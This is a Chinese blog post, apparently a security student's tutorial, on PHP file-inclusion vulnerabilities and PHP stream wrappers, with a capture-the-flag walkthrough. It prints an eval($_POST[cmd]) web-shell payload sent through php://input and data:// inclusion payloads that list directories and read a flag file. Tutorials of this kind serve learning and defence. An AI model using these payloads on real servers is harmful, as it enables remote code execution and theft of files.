php文件包含漏洞的危害,php文件包含漏洞小结

最新推荐文章于 2024-08-12 10:13:56 发布
最新推荐文章于 2024-08-12 10:13:56 发布
阅读量550 收藏 1
点赞数
文章标签: php文件包含漏洞的危害

本文由 东塔网络安全学院学员---吴同学 投稿。

0x00 文件包含的出现

开发者为了节约开发时间,可以将重复利用的代码使用文件包含的函数,如include,reuqire等进行文件包含,大大节约开发的时间和成本。

0x01文件包含函数

Include:包含并指定运行的函数。如果未找到文件则include结构会发出一条警告。

Require:包含并指定运行的函数。如果未找到文件则include结构会发出一个致命的错误。

Include_once:include_once语句和include语句完全相同,唯一区别是php会检查该文件是否已经被包含过,如果是则不会包含。

Require_once:require_once语句和require语句完全相同,唯一区别是php会检查该文件是否已经被包含过,如果是则不会包含。

0x02 php伪协议

Php支持的伪协议和封装协议:

具体协议请参照

1742c891becad0e19dca606bf381be52.png

0x03常见伪协议的用法:

1. file://:指定一个绝对路径包含,该路径表示服务器所存在的文件的路径。

例如:

3d6a24bf86dc29906e1c98f79b461829.png

2. php://

1. php://input是个可以访问请求的原始数据的只读流,在PHP5.6之前打开的数据流只能读取一次。需要在配置文件php.ini的allow_url_include设置为on。

例如:http://192.168.10.115/test.php?file=php://input 【POST DATA】<?php eval($_POST[cmd]); ?>,使用菜刀连接方式如下:

02c8ac6e4d655fec8e94ff09c79c3287.png

2. php://filter是一种元封装器,设计用于数据流打开时的筛选过滤应用。使用以下的参数将作为它路径的一部分。

b178bb644de4c9979dd8f97f45844fcf.png

例子:

1c2b1d00c8a16894b669d2beae7197d6.png

读取的内容为base64编码。

0x04例题

下面是来源于XTCTF的一道文件包含题:

e91d24fda21bd539a854567aaa619fdf.png

如图源码显示,$page表示GET传过来的参数,会将该参数进行包含。在while循环条件中,strstr表示查找字符串的首次出现,如果存在php://,循环不会结束。str_replace会将$page参数中中的php://字符替换为空,说明该循环是为了除掉php://伪协议。

这里可以发现,php://被过滤无法使用,file://需要知道本地文件的路径,我们可以使用data://伪协议进行包含。

使用playload:?page=data://text/plain, <?php echo $_SERVER['DOCUMENT_ROOT']; ?>

deb644e9058cc7316733d26f39f33072.png

输出当前文件的路径,然后使用playload:?page=data://text/plain, <?php print_r(scandir('/var/www'))?>

79d187db5b22cef69a6e0e4b8267d88d.png

读出当前路径下的所有文件,看到flag文件,读出该文件的内容就能拿到flag值。playload:?page=data://text/plain, <?php $a = file_get_contents('fl4gisisish3r3.php');echo htmlentities($a); ?>

d39e2cfbee3ef94ee2cc1a9318780429.png

Tfifthe
关注
PHP文件包含漏洞
课嗨教育的专栏
11-13 217
涉及到的危险函数include(),require()和include_once(),require_once()〕 include()&&require()语句:包括并运行指定文件。这两种结构除了在如何处理失败之外完全一样。include()产生一个警告而require()则导致一个致命错误。换句话说,如果你想在遇到丢失文件停止处理页面就用require()。include()就不是这样。 漏洞代码: root@ubuntu:/var/www# cat lif.php <
文件上传漏洞的原理、危害及防御
2301_77152761的博客
04-06 2480
Web应用程序通常会有文件上传的功能, 例如在 BBS发布图片 , 在个人网站发布ZIP 压缩 包, 在办公平台发布DOC文件等 , 只要 Web应用程序允许上传文件, 就有可能存在文件上传漏 洞.什么样的网站会有文件上传漏洞?大部分文件上传漏洞的产生是因为Web应用程序没有对上传文件的格式进行严格过滤 , 还有一部分是攻击者通过 Web服务器的解析漏洞来突破Web应用程序的防护, 后面我们会讲 到一些常见的解析漏洞, 最后还有一些不常见的其他漏洞, 如 IIS PUT 漏洞等 .
php文件包含漏洞危害,【文件包含PHP文件包含漏洞
weixin_32103009的博客
03-19 562
0x01 文件包含函数include()include_once()require()require_once()这里include()函数如果在包含的过程发生错误,会发出警告,但是会继续执行后续代码;require()函数如果在包含的过程发生错误,会报错退出,并且不再执行之后的代码。include_once()和require_once()的功能跟include()和require()类似,...
文件包含漏洞全面详解
最新发布
2401_84618514的博客
08-12 962
1.文件包含漏洞概述和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件,在使用该函数,直接调用此文件,而无需再次编写函数,这一过程叫做包含。有候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。以PHP为例,常用的文件包含函数有以下四种。
PHP漏洞文件包含漏洞
dogeace的博客
11-28 1818
php语言存在着下面几个函数存在文件包含的的功能,这些函数的本意是方便开发者及用户实现某些功能,但是如果不对文件包含的内容进行严格的的限定,会被攻击者恶意利用。这就是php文件包含漏洞。下面有四个函数可以实现文件包含分别是: 1.include();用此函数包含的候,如果出现错误,会提出警告,跳过此步骤继续执行剩下的代码。 2.require();此函数文件包含出现错误的候,终止程序的运行,与include()区别就是这里。 3.include_once()与1的唯一区别是文件只被包含一次,避免文
web安全————PHP安全之文件包含漏洞
longger_lee
01-13 2469
PHP安全问题     PHP由于灵活的语法成为目前非常流行的WEB开发语言,应用非常广泛。也是由于这个特点让PHP给安全工作带来了一些困扰。下面讨论PHP自身的语言问题。     文件包含漏洞:     文件包含漏洞也是代码注入的一种,代码注入的原理是注入一段用户能够控制执行的脚本或代码,并让服务器端执行。代码注入的典型代表就是文件包含(file inclusion).这种文件包含漏洞可能
PHP文件包含漏洞原理分析和利用方法
南三方---网站设计开发录
12-31 434
一、涉及到的危险函数include(),require()和include_once(),require_once()〕include() && require()语句:包括并运行指定文件。这两种结构除了在如何处理失败之外完全一样。include() 产生一个警告而 require() 则导致一个致命错误。换句话说,如果你想在遇到丢失文件停止处理页面就用 require()。inclu
PHP常见的几种攻击方式实例小结
10-17
本文对PHP几种常见的网络攻击方式进行了实例化的小结,主要阐述了SQL注入攻击、跨站脚本攻击(XSS)、文件包含漏洞三种攻击方法。通过具体的实例分析,深入讲解了攻击者如何利用这些漏洞,以及可能造成的后果。 ...
php 登录漏洞,PHPCMS用户登陆SQL注入漏洞分析
weixin_33856590的博客
03-11 1324
0x00 简述之前manning在调漏洞候,突然发现正常登陆不上去了,当帮忙跟了下phpcms的登陆流程。之后感觉这个流程貌似有些问题,就仔细看了下,没想到真是一个0day~~0x01 漏洞原理我们先直接看这个漏洞最根源的地方,phpsso/index.php文件所有的操作都存在严重的注入问题,这个类文件的构造函数最先调用它的父构造函数,通过auth_key来解析POST传入的data内容,...
php字符串过滤与替换小结
10-24
字符串操作是PHP编程不可或缺的一部分,包括但不限于字符串的过滤和替换。字符串过滤通常用于清理输入或输出内容,以防止安全漏洞,例如跨站脚本攻击(XSS)。字符串替换则是将文本的某些字符或字符串按照指定的...
超小PHP小马小结(方便查找后门的朋友)
10-28
文本提供了PHP小马的示例代码,这些代码通常包含如下特征: 1. 使用POST方法接收输入数据。 2. 利用`fopen`、`fwrite`等函数来操作文件。 3. 通过`eval`函数来执行动态生成的PHP代码。 4. 使用隐藏的表单字段或URL...
【网络安全篇】php文件包含漏洞
贤鱼的博客
10-13 1688
php文件包含漏洞--思路+例题讲解
PHP文件包含漏洞总结
坚持硬核
10-07 3462
首先,我们学习两个函数:require(string) include(string)这两个函数的作用是相同的, 就是将一个文件的内容包含在其所在的php代码。 例如:我们写了一个1.txt文件放在服务器上,其内容为:<?php phpinfo()?> 当我们去请求这个页面的候,自然而然,页面会原封不动的将这句话显示出来,那么有什么骚姿势可以让这句话作为php代码被解析呢? 嘿...
php 文件包含漏洞,文件包含漏洞总结
weixin_28630185的博客
03-12 314
前言:本人(九世)正式从博客园:迁移到:http://hackhat.net。会进行同步更新正文:漏洞来源:文件包含漏洞,得从文件包含说起。一般写代码的人都知道,完成一个项目里面有很多的文件调用和引用而文件包含漏洞,因为文件包含候没有做对应的防御措施导致引用的文件变成攻击者所指定的文件PHP提供了四个文件包含函数函数名称特点include遇到错误,仍会执行include_once遇到错误...
php代码执行漏洞危害,代码执行漏洞
weixin_42097508的博客
03-19 1048
代码执行当应用在调用一些能将字符转化为代码的函数(如PHP的eval),没有考虑用户是否能控制这个字符串,这就会造成代码执行漏洞。相关函数PHP:eval assertPython:execasp:Java:没有类似函数,但采用的反射机制和各种基于反射机制的表达式引擎(OGNL、SpEL、MVEL等)有类似功能phpcms的string2array函数这个函数可以将phpcms的数据库set...
PHP代码审计6—文件包含漏洞
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
07-27 1931
文件包含漏洞整理与历史漏洞分析
PHP文件包含(include)致命漏洞
创业的程序员
12-29 1548
<br />假如你的网站目录下有个这样的文件:<?php$file=$_GET['f'];$file=str_replace(".","",$file);include($file.".jpg");你会觉得存在致命漏洞么,比如我想让最后一句变成 include(test.php);你觉得有可能吗?其实很简单,除了.用于标识文件扩展名之外,还可以用 “,地址栏输入 ?f=test”php%00 就可以达到目的了,%00是ascii码为0的字符,在这里会产生截断,而 test”php,被include当成了te
深入理解PHP文件包含漏洞:原理、利用与防御
本地文件包含漏洞允许攻击者通过操纵变量来包含服务器上的任意文件,而远程文件包含漏洞则允许攻击者通过变量包含网络上的任何可访问文件,这通常导致更严重的安全风险,因为攻击者可以执行远程服务器上的恶意代码。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值